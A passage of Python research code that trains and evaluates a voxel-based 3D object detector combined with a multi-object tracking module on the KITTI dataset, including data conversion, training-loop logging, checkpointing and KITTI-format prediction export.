enumerate(val_loader):\n input = input.cuda()\n if len(det_info) > 0:\n for k, v in det_info.items():\n det_info[k] = det_info[k].cuda() if not isinstance(\n det_info[k], list) else det_info[k]\n\n # compute output\n aligned_ids, aligned_dets, frame_start = net.predict(\n input[0], det_info, dets, det_split)\n\n batch_time.update(time.time() - end)\n end = time.time()\n if i % config.print_freq == 0:\n logger.info(\n 'Test Frame: [{0}/{1}]\\tTime '\n '{batch_time.val:.3f} ({batch_time.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time))\n\n\ndef _get_pos_neg_loss(cls_loss, labels):\n # cls_loss: [N, num_anchors, num_class]\n # labels: [N, num_anchors]\n batch_size = cls_loss.shape[0]\n if cls_loss.shape[-1] == 1 or len(cls_loss.shape) == 2:\n cls_pos_loss = (labels > 0).type_as(cls_loss) * cls_loss.view(\n batch_size, -1)\n cls_neg_loss = (labels == 0).type_as(cls_loss) * cls_loss.view(\n batch_size, -1)\n cls_pos_loss = cls_pos_loss.sum() / batch_size\n cls_neg_loss = cls_neg_loss.sum() / batch_size\n else:\n cls_pos_loss = cls_loss[..., 1:].sum() / batch_size\n cls_neg_loss = cls_loss[..., 0].sum() / batch_size\n return cls_pos_loss, cls_neg_loss\n\n\ndef _flat_nested_json_dict(json_dict, flatted, sep=\".\", start=\"\"):\n for k, v in json_dict.items():\n if isinstance(v, dict):\n _flat_nested_json_dict(v, flatted, sep, start + sep + k)\n else:\n flatted[start + sep + k] = v\n\n\ndef flat_nested_json_dict(json_dict, sep=\".\") -> dict:\n \"\"\"flat a nested json-like dict. this function make shadow copy.\n \"\"\"\n flatted = {}\n for k, v in json_dict.items():\n if isinstance(v, dict):\n _flat_nested_json_dict(v, flatted, sep, k)\n else:\n flatted[k] = v\n return flatted\n\n\ndef example_convert_to_torch(example, dtype=torch.float32,\n device=None) -> dict:\n device = device or torch.device(\"cuda:0\")\n example_torch = {}\n float_names = [\n \"voxels\", \"anchors\", \"reg_targets\", \"reg_weights\", \"bev_map\", \"rect\",\n \"Trv2c\", \"P2\", \"f_view\",\"idxs_norm\", \"p_voxels\", \"p_f_view\", \"p_idxs_norm\", 'box_id', 'p_box_id', 'gt_boxes', 'p_gt_boxes', 'boxes_2d', 'p_boxes_2d'\n ]\n\n for k, v in example.items():\n if k in float_names:\n example_torch[k] = torch.tensor(v, dtype=torch.float32, device=device).to(dtype)\n elif k in [\"coordinates\", \"labels\", \"num_points\", \"p_coordinates\", \"p_num_points\"]:\n example_torch[k] = torch.tensor(\n v, dtype=torch.int32, device=device)\n elif k in [\"anchors_mask\"]:\n example_torch[k] = torch.tensor(\n v, dtype=torch.uint8, device=device)\n else:\n example_torch[k] = v\n return example_torch\n\n\ndef train(config_path,\n model_dir,\n use_fusion=True,\n use_ft=False,\n use_second_stage=True,\n use_endtoend=True,\n result_path=None,\n create_folder=False,\n display_step=50,\n summary_step=5,\n local_rank=0,\n pickle_result=True,\n patchs=None):\n \"\"\"train a VoxelNet mod[el specified by a config file.\n \"\"\"\n ############ tracking\n config_tr_path = '/mnt/new_iou/second.pytorch/second/mmMOT/experiments/second/spatio_test/config.yaml'\n load_tr_path = '/mnt/new_iou/second.pytorch/second/mmMOT/experiments/second/spatio_test/results'\n with open(config_tr_path) as f:\n config_tr = yaml.load(f, Loader=yaml.FullLoader)\n\n result_path_tr = load_tr_path\n config_tr = EasyDict(config_tr['common'])\n config_tr.save_path = os.path.dirname(config_tr_path)\n\n # create model\n # model_tr = build_model(config_tr)\n # model_tr.cuda()\n\n # optimizer_tr = build_optim(model_tr, config_tr)\n\n criterion_tr = 
build_criterion(config_tr.loss)\n\n last_iter = -1\n best_mota = 0\n # if load_tr_path:\n # if False:\n # best_mota, last_iter = load_state(\n # load_tr_path, model_tr, optimizer=optimizer_tr)\n # else:\n # load_state(load_tr_path, model_tr)\n\n cudnn.benchmark = True\n\n # Data loading code\n train_transform, valid_transform = build_augmentation(config_tr.augmentation)\n\n # # train\n # train_dataset = build_dataset(\n # config_tr,\n # set_source='train',\n # evaluate=False,\n # train_transform=train_transform)\n # trainval_dataset = build_dataset(\n # config_tr,\n # set_source='train',\n # evaluate=True,\n # valid_transform=valid_transform)\n # val_dataset = build_dataset(\n # config_tr,\n # set_source='val',\n # evaluate=True,\n # valid_transform=valid_transform)\n\n # train_sampler = DistributedGivenIterationSampler(\n # train_dataset,\n # config_tr.lr_scheduler.max_iter,\n # config_tr.batch_size,\n # world_size=1,\n # rank=0,\n # last_iter=last_iter)\n\n # import pdb; pdb.set_trace()\n # train_loader = DataLoader(\n # train_dataset,\n # batch_size=config_tr.batch_size,\n # shuffle=False,\n # num_workers=config_tr.workers,\n # pin_memory=True)\n\n tb_logger = SummaryWriter(config_tr.save_path + '/events')\n logger = create_logger('global_logger', config_tr.save_path + '/log.txt')\n # logger.info('args: {}'.format(pprint.pformat(args)))\n logger.info('config: {}'.format(pprint.pformat(config_tr)))\n\n # tracking_module = TrackingModule(model_tr, criterion_tr,\n # config_tr.det_type)\n # tracking_module.model.train()\n #### tracking setup done\n\n if create_folder:\n if pathlib.Path(model_dir).exists():\n model_dir = torchplus.train.create_folder(model_dir)\n patchs = patchs or []\n model_dir = pathlib.Path(model_dir)\n model_dir.mkdir(parents=True, exist_ok=True)\n if result_path is None:\n result_path = model_dir / 'results'\n config_file_bkp = \"pipeline.config\"\n config = pipeline_pb2.TrainEvalPipelineConfig()\n with open(config_path, \"r\") as f:\n proto_str = f.read()\n text_format.Merge(proto_str, config)\n for patch in patchs:\n patch = \"config.\" + patch \n exec(patch)\n shutil.copyfile(config_path, str(model_dir / config_file_bkp))\n input_cfg = config.train_input_reader\n eval_input_cfg = config.eval_input_reader\n model_cfg = config.model.second\n train_cfg = config.train_config\n\n ######################\n # BUILD VOXEL GENERATOR\n ######################\n voxel_generator = voxel_builder.build(model_cfg.voxel_generator)\n ######################\n # BUILD TARGET ASSIGNER\n ######################\n bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]\n box_coder = box_coder_builder.build(model_cfg.box_coder)\n target_assigner_cfg = model_cfg.target_assigner\n target_assigner = target_assigner_builder.build(target_assigner_cfg,\n bv_range, box_coder)\n class_names = target_assigner.classes\n ######################\n # BUILD NET\n ######################\n center_limit_range = model_cfg.post_center_limit_range\n # if use_second_stage:\n # net = second_2stage_builder.build(model_cfg, voxel_generator, target_assigner)\n if use_endtoend:\n net = second_endtoend_builder_spatio.build(model_cfg, voxel_generator, target_assigner, criterion_tr, config_tr.det_type)\n else:\n net = second_builder.build(model_cfg, voxel_generator, target_assigner)\n net.cuda()\n print(\"num_trainable parameters:\", len(list(net.parameters())))\n\n for n, p in net.named_parameters():\n print(n, p.shape)\n # pth_name = './pre_weight/first_stage_gating_det/voxelnet-17013.tckpt'\n pth_name = 
'./pre_weight/second_stage_gating_det/voxelnet-35000.tckpt'\n\n res_pre_weights = torch.load(pth_name)\n new_res_state_dict = OrderedDict()\n model_dict = net.state_dict()\n for k,v in res_pre_weights.items():\n if 'global_step' not in k:\n # if 'dir' not in k:\n new_res_state_dict[k] = v\n model_dict.update(new_res_state_dict)\n net.load_state_dict(model_dict)\n\n # for k, weight in dict(net.named_parameters()).items(): # lidar_conv, p_lidar_conv, fusion_module, w_det, w_link, appearance, point_net\n # if 'middle_feature_extractor' in '%s'%(k) or 'rpn' in '%s'%(k) or 'second_rpn' in '%s'%(k):\n # weight.requires_grad = False\n\n # BUILD OPTIMIZER\n #####################\n # we need global_step to create lr_scheduler, so restore net first.\n torchplus.train.try_restore_latest_checkpoints(model_dir, [net])\n gstep = net.get_global_step() - 1\n optimizer_cfg = train_cfg.optimizer\n if train_cfg.enable_mixed_precision:\n net.half()\n net.metrics_to_float()\n net.convert_norm_to_float(net)\n loss_scale = train_cfg.loss_scale_factor\n mixed_optimizer = optimizer_builder.build(optimizer_cfg, net, mixed=train_cfg.enable_mixed_precision, loss_scale=loss_scale)\n optimizer = mixed_optimizer\n\n # must restore optimizer AFTER using MixedPrecisionWrapper\n torchplus.train.try_restore_latest_checkpoints(model_dir,\n [mixed_optimizer])\n lr_scheduler = lr_scheduler_builder.build(optimizer_cfg, optimizer, train_cfg.steps)\n if train_cfg.enable_mixed_precision:\n float_dtype = torch.float16\n else:\n float_dtype = torch.float32\n ######################\n # PREPARE INPUT\n ######################\n # import pdb; pdb.set_trace()\n dataset = input_reader_builder_tr_vid_spatio.build(\n input_cfg,\n model_cfg,\n training=True,\n voxel_generator=voxel_generator,\n target_assigner=target_assigner,\n config_tr=config_tr,\n set_source='train',\n evaluate=False,\n train_transform=train_transform)\n eval_dataset = input_reader_builder_tr_vid_spatio.build(\n eval_input_cfg,\n model_cfg,\n training=False,\n voxel_generator=voxel_generator,\n target_assigner=target_assigner,\n config_tr=config_tr,\n set_source='val',\n evaluate=True,\n valid_transform=valid_transform)\n\n def _worker_init_fn(worker_id):\n time_seed = np.array(time.time(), dtype=np.int32)\n np.random.seed(time_seed + worker_id)\n print(f\"WORKER {worker_id} seed:\", np.random.get_state()[1][0])\n\n dataloader = torch.utils.data.DataLoader(\n dataset,\n batch_size=input_cfg.batch_size,\n shuffle=True,\n num_workers=input_cfg.num_workers,\n pin_memory=False,\n collate_fn=merge_second_batch_tr_vid_spatio,\n worker_init_fn=_worker_init_fn)\n\n eval_dataloader = torch.utils.data.DataLoader(\n eval_dataset,\n batch_size=eval_input_cfg.batch_size,\n shuffle=False,\n num_workers=eval_input_cfg.num_workers,\n pin_memory=False,\n collate_fn=merge_second_batch_tr_vid_spatio)\n \n data_iter = iter(dataloader)\n\n ######################\n # TRAINING\n ######################\n training_detail = []\n log_path = model_dir / 'log.txt'\n training_detail_path = model_dir / 'log.json'\n if training_detail_path.exists():\n with open(training_detail_path, 'r') as f:\n training_detail = json.load(f)\n logf = open(log_path, 'a')\n logf.write(proto_str)\n logf.write(\"\\n\")\n summary_dir = model_dir / 'summary'\n summary_dir.mkdir(parents=True, exist_ok=True)\n writer = SummaryWriter(str(summary_dir))\n\n total_step_elapsed = 0\n remain_steps = train_cfg.steps - net.get_global_step()\n t = time.time()\n ckpt_start_time = t\n\n total_loop = train_cfg.steps // 
train_cfg.steps_per_eval + 1\n clear_metrics_every_epoch = train_cfg.clear_metrics_every_epoch\n\n if train_cfg.steps % train_cfg.steps_per_eval == 0:\n total_loop -= 1\n mixed_optimizer.zero_grad()\n \n # optimizer_tr.zero_grad()\n logger = logging.getLogger('global_logger')\n best_mota = 0\n losses = AverageMeter(config_tr.print_freq)\n\n total_steps = train_cfg.steps\n total_loop = total_steps // len(dataloader)\n \n kkkk = 0\n for step in range(total_loop):\n for i, (example) in enumerate(dataloader):\n\n curr_step = 0 + i\n kkkk += 1\n lr_scheduler.step(net.get_global_step())\n\n example_torch = example_convert_to_torch(example, float_dtype)\n\n batch_size = example[\"anchors\"].shape[0]\n\n ret_dict = net(example_torch, train_param=True)\n\n cls_preds = ret_dict[\"cls_preds\"]\n loss = ret_dict[\"loss\"].mean()\n cls_loss_reduced = ret_dict[\"cls_loss_reduced\"].mean()\n loc_loss_reduced = ret_dict[\"loc_loss_reduced\"].mean()\n cls_pos_loss = ret_dict[\"cls_pos_loss\"]\n cls_neg_loss = ret_dict[\"cls_neg_loss\"]\n loc_loss = ret_dict[\"loc_loss\"]\n cls_loss = ret_dict[\"cls_loss\"]\n dir_loss_reduced = ret_dict[\"dir_loss_reduced\"]\n cared = ret_dict[\"cared\"]\n # loss_tr = ret_dict[\"loss_tr\"]\n\n if use_second_stage or use_endtoend:\n labels = ret_dict[\"labels\"]\n else:\n labels = example_torch[\"labels\"]\n if train_cfg.enable_mixed_precision:\n loss *= loss_scale\n\n try:\n loss.backward()\n except:\n abc = 1\n # import pdb; pdb.set_trace()\n # abc = 1\n # torch.nn.utils.clip_grad_norm_(net.parameters(), 10.0)\n # optimizer_tr.step()\n # optimizer_tr.zero_grad()\n mixed_optimizer.step()\n mixed_optimizer.zero_grad()\n net.update_global_step()\n net_metrics = net.update_metrics(cls_loss_reduced,\n loc_loss_reduced, cls_preds,\n labels, cared)\n\n step_time = (time.time() - t)\n t = time.time()\n metrics = {}\n num_pos = int((labels > 0)[0].float().sum().cpu().numpy())\n num_neg = int((labels == 0)[0].float().sum().cpu().numpy())\n if 'anchors_mask' not in example_torch:\n num_anchors = example_torch['anchors'].shape[1]\n else:\n num_anchors = int(example_torch['anchors_mask'][0].sum())\n global_step = net.get_global_step()\n # print(step)\n if global_step % display_step == 0:\n loc_loss_elem = [\n float(loc_loss[:, :, i].sum().detach().cpu().numpy() /\n batch_size) for i in range(loc_loss.shape[-1])\n ]\n metrics[\"type\"] = \"step_info\"\n metrics[\"step\"] = global_step\n metrics[\"steptime\"] = step_time\n metrics.update(net_metrics)\n metrics[\"loss\"] = {}\n metrics[\"loss\"][\"loc_elem\"] = loc_loss_elem\n metrics[\"loss\"][\"cls_pos_rt\"] = float(\n cls_pos_loss.detach().cpu().numpy())\n metrics[\"loss\"][\"cls_neg_rt\"] = float(\n cls_neg_loss.detach().cpu().numpy())\n if model_cfg.use_direction_classifier:\n metrics[\"loss\"][\"dir_rt\"] = float(\n dir_loss_reduced.detach().cpu().numpy())\n metrics[\"num_vox\"] = int(example_torch[\"voxels\"].shape[0])\n metrics[\"num_pos\"] = int(num_pos)\n metrics[\"num_neg\"] = int(num_neg)\n metrics[\"num_anchors\"] = int(num_anchors)\n metrics[\"lr\"] = float(\n optimizer.lr)\n\n metrics[\"image_idx\"] = example['image_idx'][0][7:]\n training_detail.append(metrics)\n flatted_metrics = flat_nested_json_dict(metrics)\n flatted_summarys = flat_nested_json_dict(metrics, \"/\")\n for k, v in flatted_summarys.items():\n if isinstance(v, (list, tuple)):\n v = {str(i): e for i, e in enumerate(v)}\n if type(v) != str and ('loc_elem' not in k):\n writer.add_scalars(k, v, global_step)\n else:\n if (type(v) != str) and ('loc_elem' not in 
k):\n writer.add_scalar(k, v, global_step)\n\n metrics_str_list = []\n for k, v in flatted_metrics.items():\n if isinstance(v, float):\n metrics_str_list.append(f\"{k}={v:.3}\")\n elif isinstance(v, (list, tuple)):\n if v and isinstance(v[0], float):\n v_str = ', '.join([f\"{e:.3}\" for e in v])\n metrics_str_list.append(f\"{k}=[{v_str}]\")\n else:\n metrics_str_list.append(f\"{k}={v}\")\n else:\n metrics_str_list.append(f\"{k}={v}\")\n log_str = ', '.join(metrics_str_list)\n print(log_str, file=logf)\n print(log_str)\n\n ckpt_elasped_time = time.time() - ckpt_start_time\n if ckpt_elasped_time > train_cfg.save_checkpoints_secs:\n torchplus.train.save_models(model_dir, [net, optimizer], net.get_global_step())\n\n ckpt_start_time = time.time()\n\n if kkkk > 0 and (kkkk) % config_tr.val_freq == 0:\n # if True:\n torchplus.train.save_models(model_dir, [net, optimizer], net.get_global_step())\n net.eval()\n result_path_step = result_path / f\"step_{net.get_global_step()}\"\n result_path_step.mkdir(parents=True, exist_ok=True)\n print(\"#################################\")\n print(\"#################################\", file=logf)\n print(\"# EVAL\")\n print(\"# EVAL\", file=logf)\n print(\"#################################\")\n print(\"#################################\", file=logf)\n print(\"Generate output labels...\")\n print(\"Generate output labels...\", file=logf)\n t = time.time()\n dt_annos = []\n prog_bar = ProgressBar()\n net.clear_timer()\n prog_bar.start((len(eval_dataset) + eval_input_cfg.batch_size - 1) // eval_input_cfg.batch_size)\n for example in iter(eval_dataloader):\n example = example_convert_to_torch(example, float_dtype)\n if pickle_result:\n results = predict_kitti_to_anno(\n net, example, class_names, center_limit_range,\n model_cfg.lidar_input)\n dt_annos += results\n\n else:\n _predict_kitti_to_file(net, example, result_path_step,\n class_names, center_limit_range,\n model_cfg.lidar_input)\n\n prog_bar.print_bar()\n\n sec_per_ex = len(eval_dataset) / (time.time() - t)\n print(f'generate label finished({sec_per_ex:.2f}/s). start eval:')\n print(f'generate label finished({sec_per_ex:.2f}/s). 
start eval:',file=logf)\n gt_annos = [\n info[\"annos\"] for info in eval_dataset.dataset.kitti_infos\n ]\n if not pickle_result:\n dt_annos = kitti.get_label_annos(result_path_step)\n # result = get_official_eval_result_v2(gt_annos, dt_annos, class_names)\n # print(json.dumps(result, indent=2), file=logf)\n result = get_official_eval_result(gt_annos, dt_annos, class_names)\n print(result, file=logf)\n print(result)\n result_1 = result.split(\"\\n\")[:5]\n result_2 = result.split(\"\\n\")[10:15]\n result_3 = result.split(\"\\n\")[20:25]\n emh = ['0_easy', '1_mod', '2_hard']\n result_save = result_1\n for i in range(len(result_save)-1):\n save_targ = result_save[i+1]\n name_val = save_targ.split(':')[0].split(' ')[0]\n value_val = save_targ.split(':')[1:]\n for ev in range(3):\n each_val = value_val[0].split(',')[ev]\n merge_txt = 'AP_kitti/car_70/' + name_val+'/'+emh[ev]\n try:\n writer.add_scalar(merge_txt, float(each_val), global_step)\n except:\n abc=1\n import pdb; pdb.set_trace()\n abc=1\n if pickle_result:\n with open(result_path_step / \"result.pkl\", 'wb') as f:\n pickle.dump(dt_annos, f)\n writer.add_text('eval_result', result, global_step)\n\n logger.info('Evaluation on validation set:')\n # MOTA, MOTP, recall, prec, F1, fp, fn, id_switches = validate(\n # val_dataset,\n # net,\n # str(0 + 1),\n # config_tr,\n # result_path_tr,\n # part='val')\n # print(MOTA, MOTP, recall, prec, F1, fp, fn, id_switches)\n\n # curr_step = step\n # if tb_logger is not None:\n # tb_logger.add_scalar('prec', prec, curr_step)\n # tb_logger.add_scalar('recall', recall, curr_step)\n # tb_logger.add_scalar('mota', MOTA, curr_step)\n # tb_logger.add_scalar('motp', MOTP, curr_step)\n # tb_logger.add_scalar('fp', fp, curr_step)\n # tb_logger.add_scalar('fn', fn, curr_step)\n # tb_logger.add_scalar('f1', F1, curr_step)\n # tb_logger.add_scalar('id_switches', id_switches, curr_step)\n # if lr_scheduler is not None:\n # tb_logger.add_scalar('lr', current_lr, curr_step)\n\n # is_best = MOTA > best_mota\n # best_mota = max(MOTA, best_mota)\n # print(best_mota)\n\n # import pdb; pdb.set_trace()\n # save_checkpoint(\n # { 'step': net.get_global_step(),\n # 'score_arch': config_tr.model.score_arch,\n # 'appear_arch': config_tr.model.appear_arch,\n # 'best_mota': best_mota,\n # 'state_dict': tracking_module.model.state_dict(),\n # 'optimizer': tracking_module.optimizer.state_dict(),\n # }, is_best, config_tr.save_path + '/ckpt')\n\n # net.train()\n\n # save model before exit\n torchplus.train.save_models(model_dir, [net, optimizer],\n net.get_global_step())\n logf.close()\n\n\ndef _predict_kitti_to_file(net,\n example,\n result_save_path,\n class_names,\n center_limit_range=None,\n lidar_input=False):\n batch_image_shape = example['image_shape']\n batch_imgidx = example['image_idx']\n predictions_dicts, assign_det, assign_link, assign_new, assign_end = net(example)\n # t = time.time()\n for i, preds_dict in enumerate(predictions_dicts):\n image_shape = batch_image_shape[i]\n img_idx = preds_dict[\"image_idx\"][7:]\n if preds_dict[\"bbox\"] is not None or preds_dict[\"bbox\"].size.numel():\n box_2d_preds = preds_dict[\"bbox\"].data.cpu().numpy()\n box_preds = preds_dict[\"box3d_camera\"].data.cpu().numpy()\n scores = preds_dict[\"scores\"].data.cpu().numpy()\n box_preds_lidar = preds_dict[\"box3d_lidar\"].data.cpu().numpy()\n # write pred to file\n box_preds = box_preds[:, [0, 1, 2, 4, 5, 3,\n 6]] # lhw->hwl(label file format)\n label_preds = preds_dict[\"label_preds\"].data.cpu().numpy()\n # label_preds = 
np.zeros([box_2d_preds.shape[0]], dtype=np.int32)\n result_lines = []\n for box, box_lidar, bbox, score, label in zip(\n box_preds, box_preds_lidar, box_2d_preds, scores,\n label_preds):\n if not lidar_input:\n if bbox[0] > image_shape[1] or bbox[1] > image_shape[0]:\n continue\n if bbox[2] < 0 or bbox[3] < 0:\n continue\n # print(img_shape)\n if center_limit_range is not None:\n limit_range = np.array(center_limit_range)\n if (np.any(box_lidar[:3] < limit_range[:3])\n or np.any(box_lidar[:3] > limit_range[3:])):\n continue\n bbox[2:] = np.minimum(bbox[2:], image_shape[::-1])\n bbox[:2] = np.maximum(bbox[:2], [0, 0])\n result_dict = {\n 'name': class_names[int(label)],\n 'alpha': -np.arctan2(-box_lidar[1], box_lidar[0]) + box[6],\n 'bbox': bbox,\n 'location': box[:3],\n 'dimensions': box[3:6],\n 'rotation_y': box[6],\n 'score': score,\n }\n result_line = kitti.kitti_result_line(result_dict)\n result_lines.append(result_line)\n else:\n result_lines = []\n result_file = f\"{result_save_path}/{kitti.get_image_index_str(img_idx)}.txt\"\n result_str = '\\n'.join(result_lines)\n with open(result_file, 'w') as f:\n f.write(result_str)\n\n\ndef predict_kitti_to_anno(net,\n example,\n class_names,\n center_limit_range=None,\n lidar_input=False,\n global_set=None):\n batch_image_shape = example['image_shape']\n batch_imgidx = example['image_idx']\n predictions_dicts = net(example, False)\n # t = time.time()\n annos = []\n for i, preds_dict in enumerate(predictions_dicts):\n image_shape = batch_image_shape[i]\n img_idx = preds_dict[\"image_idx\"][7:]\n if preds_dict[\"bbox\"] is not None or preds_dict[\"bbox\"].size.numel() != 0:\n box_2d_preds = preds_dict[\"bbox\"].detach().cpu().numpy()\n box_preds = preds_dict[\"box3d_camera\"].detach().cpu().numpy()\n scores = preds_dict[\"scores\"].detach().cpu().numpy()\n box_preds_lidar = preds_dict[\"box3d_lidar\"].detach().cpu().numpy()\n # write pred to file\n label_preds = preds_dict[\"label_preds\"].detach().cpu().numpy()\n # label_preds = np.zeros([box_2d_preds.shape[0]], dtype=np.int32)\n anno = kitti.get_start_result_anno()\n num_example = 0\n for box, box_lidar, bbox, score, label in zip(\n box_preds, box_preds_lidar, box_2d_preds, scores,\n label_preds):\n if not lidar_input:\n if bbox[0] > image_shape[1] or bbox[1] > image_shape[0]:\n continue\n if bbox[2] < 0 or bbox[3] < 0:\n continue\n # print(img_shape)\n if center_limit_range is not None:\n limit_range = np.array(center_limit_range)\n if (np.any(box_lidar[:3] < limit_range[:3])\n or np.any(box_lidar[:3] > limit_range[3:])):\n continue\n bbox[2:] = np.minimum(bbox[2:], image_shape[::-1])\n bbox[:2] = np.maximum(bbox[:2], [0, 0])\n anno[\"name\"].append(class_names[int(label)])\n anno[\"truncated\"].append(0.0)\n anno[\"occluded\"].append(0)\n anno[\"alpha\"].append(-np.arctan2(-box_lidar[1], box_lidar[0]) +\n box[6])\n anno[\"bbox\"].append(bbox)\n anno[\"dimensions\"].append(box[3:6])\n anno[\"location\"].append(box[:3])\n anno[\"rotation_y\"].append(box[6])\n if global_set is not None:\n for i in range(100000):\n if score in global_set:\n score -= 1 / 100000\n else:\n global_set.add(score)\n break\n anno[\"score\"].append(score)\n\n num_example += 1\n if num_example != 0:\n anno = {n: np.stack(v) for n, v in anno.items()}\n annos.append(anno)\n else:\n annos.append(kitti.empty_result_anno())\n else:\n annos.append(kitti.empty_result_anno())\n num_example = annos[-1][\"name\"].shape[0]\n # import pdb; pdb.set_trace()\n annos[-1][\"image_idx\"] = np.array(\n [img_idx] * num_example, 
dtype=np.int64)\n return annos\n\ndef evaluate(config_path,\n model_dir,\n use_second_stage=False,\n use_endtoend=False,\n result_path=None,\n predict_test=False,\n ckpt_path=None,\n ref_detfile=None,\n pickle_result=True,\n measure_time=False,\n batch_size=None):\n model_dir = pathlib.Path(model_dir)\n if predict_test:\n result_name = 'predict_test_0095'\n else:\n result_name = 'eval_results'\n if result_path is None:\n result_path = model_dir / result_name\n else:\n result_path = pathlib.Path(result_path)\n config = pipeline_pb2.TrainEvalPipelineConfig()\n with open(config_path, \"r\") as f:\n proto_str = f.read()\n text_format.Merge(proto_str, config)\n\n input_cfg = config.eval_input_reader\n model_cfg = config.model.second\n train_cfg = config.train_config\n \n center_limit_range = model_cfg.post_center_limit_range\n ######################\n # BUILD VOXEL GENERATOR\n ######################\n voxel_generator = voxel_builder.build(model_cfg.voxel_generator)\n bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]\n box_coder = box_coder_builder.build(model_cfg.box_coder)\n target_assigner_cfg = model_cfg.target_assigner\n target_assigner = target_assigner_builder.build(target_assigner_cfg,\n bv_range, box_coder)\n class_names = target_assigner.classes\n if use_second_stage: \n net = second_2stage_builder.build(model_cfg, voxel_generator, target_assigner, measure_time=measure_time)\n elif use_endtoend:\n net = second_endtoend_builder.build(model_cfg, voxel_generator, target_assigner, measure_time=measure_time)\n else:\n net = second_builder.build(model_cfg, voxel_generator, target_assigner, measure_time=measure_time)\n net.cuda()\n #########################################\n # net = torch.nn.DataParallel(net)\n #########################################\n if ckpt_path is None:\n torchplus.train.try_restore_latest_checkpoints(model_dir, [net])\n else:\n torchplus.train.restore(ckpt_path, net)\n if train_cfg.enable_mixed_precision:\n net.half()\n print(\"half inference!\")\n net.metrics_to_float()\n net.convert_norm_to_float(net)\n batch_size = batch_size or input_cfg.batch_size\n eval_dataset = input_reader_builder_tr.build(\n input_cfg,\n model_cfg,\n training=False,\n voxel_generator=voxel_generator,\n target_assigner=target_assigner)\n eval_dataloader = torch.utils.data.DataLoader(\n eval_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=0,# input_cfg.num_workers,\n pin_memory=False,\n collate_fn=merge_second_batch)\n\n if train_cfg.enable_mixed_precision:\n float_dtype = torch.float16\n else:\n float_dtype = torch.float32\n\n net.eval()\n result_path_step = result_path / f\"step_{net.get_global_step()}\"\n result_path_step.mkdir(parents=True, exist_ok=True)\n t = time.time()\n dt_annos = []\n global_set = None\n print(\"Generate output labels...\")\n bar = ProgressBar()\n bar.start((len(eval_dataset) + batch_size - 1) // batch_size)\n prep_example_times = []\n prep_times = []\n t2 = time.time()\n for example in iter(eval_dataloader):\n if measure_time:\n prep_times.append(time.time() - t2)\n t1 = time.time()\n torch.cuda.synchronize()\n example = example_convert_to_torch(example, float_dtype)\n if measure_time:\n torch.cuda.synchronize()\n prep_example_times.append(time.time() - t1)\n\n if pickle_result:\n dt_annos += predict_kitti_to_anno(\n net, example, class_names, center_limit_range,\n model_cfg.lidar_input, global_set)\n else:\n _predict_kitti_to_file(net, example, result_path_step, class_names,\n center_limit_range, model_cfg.lidar_input)\n # 
print(json.dumps(net.middle_feature_extractor.middle_conv.sparity_dict))\n bar.print_bar()\n if measure_time:\n t2 = time.time()\n\n sec_per_example = len(eval_dataset) / (time.time() - t)\n print(f'generate label finished({sec_per_example:.2f}/s). start eval:')\n if measure_time:\n print(f\"avg example to torch time: {np.mean(prep_example_times) * 1000:.3f} ms\")\n print(f\"avg prep time: {np.mean(prep_times) * 1000:.3f} ms\")\n for name, val in net.get_avg_time_dict().items():\n print(f\"avg {name} time = {val * 1000:.3f} ms\")\n if not predict_test:\n gt_annos = [info[\"annos\"] for info in eval_dataset.dataset.kitti_infos]\n img_idx = [info[\"image_idx\"] for info in eval_dataset.dataset.kitti_infos]\n if not pickle_result:\n dt_annos = kitti.get_label_annos(result_path_step)\n result = get_official_eval_result(gt_annos, dt_annos, class_names)\n # print(json.dumps(result, indent=2))\n print(result)\n result = get_coco_eval_result(gt_annos, dt_annos, class_names)\n print(result)\n if pickle_result:\n with open(result_path_step / \"result.pkl\", 'wb') as f:\n pickle.dump(dt_annos, f)\n # annos to txt file\n if True:\n os.makedirs(str(result_path_step) + '/txt', exist_ok=True)\n for i in range(len(dt_annos)):\n dt_annos[i]['dimensions'] = dt_annos[i]['dimensions'][:, [1, 2, 0]]\n result_lines = kitti.annos_to_kitti_label(dt_annos[i])\n image_idx = img_idx[i]\n with open(str(result_path_step) + '/txt/%06d.txt' % image_idx, 'w') as f:\n for result_line in result_lines:\n f.write(result_line + '\\n')\n abcd = 1\n else:\n os.makedirs(str(result_path_step) + '/txt', exist_ok=True)\n img_idx = [info[\"image_idx\"] for info in eval_dataset.dataset.kitti_infos]\n for i in range(len(dt_annos)):\n dt_annos[i]['dimensions'] = dt_annos[i]['dimensions'][:, [1, 2, 0]]\n result_lines = kitti.annos_to_kitti_label(dt_annos[i])\n image_idx = img_idx[i]\n with open(str(result_path_step) + '/txt/%06d.txt' % image_idx, 'w') as f:\n for result_line in result_lines:\n f.write(result_line + '\\n')\n\n\ndef save_config(config_path, save_path):\n config = pipeline_pb2.TrainEvalPipelineConfig()\n with open(config_path, \"r\") as f:\n proto_str = f.read()\n text_format.Merge(proto_str, config)\n ret = text_format.MessageToString(config, indent=2)\n with open(save_path, 'w') as f:\n f.write(ret)\n\ndef assign_det_id(self, assign_det, assign_link, assign_new, assign_end,\n det_split, dets):\n det_start_idx = 0\n det_ids = []\n already_used_id = []\n fake_ids = []\n dets_out = []\n\n for i in range(len(det_split)):\n frame_id = []\n det_curr_num = det_split[i].item()\n fake_id = []\n det_out = get_start_gt_anno()\n for j in range(det_curr_num):\n curr_det_idx = det_start_idx + j\n # check w_det\n if assign_det[curr_det_idx] != 1:\n fake_id.append(-1)\n continue\n else:\n # det_out.append(dets[i][j])\n det_out['name'].append(dets[i]['name'][:, j])\n det_out['truncated'].append(dets[i]['truncated'][:, j])\n det_out['occluded'].append(dets[i]['occluded'][:, j])\n det_out['alpha'].append(dets[i]['alpha'][:, j])\n det_out['bbox'].append(dets[i]['bbox'][:, j])\n det_out['dimensions'].append(dets[i]['dimensions'][:, j])\n det_out['location'].append(dets[i]['location'][:, j])\n det_out['rotation_y'].append(dets[i]['rotation_y'][:, j])\n\n # w_det=1, check whether a new det\n if i == 0:\n if len(already_used_id) == 0:\n frame_id.append(0)\n fake_id.append(0)\n already_used_id.append(0)\n det_out['id'].append(torch.Tensor([0]).long())\n else:\n new_id = already_used_id[-1] + 1\n frame_id.append(new_id)\n fake_id.append(new_id)\n 
